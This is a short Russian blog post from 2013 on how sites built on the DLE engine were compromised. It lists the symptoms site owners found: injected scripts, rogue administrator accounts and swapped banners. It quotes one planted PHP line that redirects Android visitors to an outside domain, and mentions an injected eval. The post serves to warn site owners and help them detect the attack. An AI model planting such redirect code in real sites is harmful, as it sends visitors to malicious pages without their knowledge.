Как ломали сайты на DLE
Воскресенье, 10 Фев 2013 5:12
Начало. Уязвимость в сайтах на движке
Как видим, добавился не только новый домен http://yacounter.ws (ну любит злоумышленник зону ws, что тут поделать), но и eval.
Но и за первую версию также есть случаи, которые говорят следующее.
В файлах движка цмс dle появляется совсем другой код, например, такой:
if(stripos($_SERVER[‘HTTP_USER_AGENT’],”Android”)!==false)
{header(‘Location: http://refresh-browser.00xff.net/’);exit;}
Как видим, домен здесь совсем другой. Кроме того, были выявлены следующие факты:
– в главном шаблоне сайта, main.tpl, в яваскриптах появляются посторонние строки;
– кто-то меняет кодировку шаблона, после чего пропадает весь русский текст (я думаю, что кодировку никто не меняет, просто-напросто так действует посторонний код);
– опять-таки в файле main.tpl едет вниз или в сторону вёрстка шаблона, что снова говорит о присутствии постороннего кода;
– в индексном файле появляются посторонние java-скрипты;
– появляются пользователи с правами администраторов, появляются сообщения о каких-то «левых» действиях в админ-панели сайта, меняются рекламные баннеры. Читать полностью »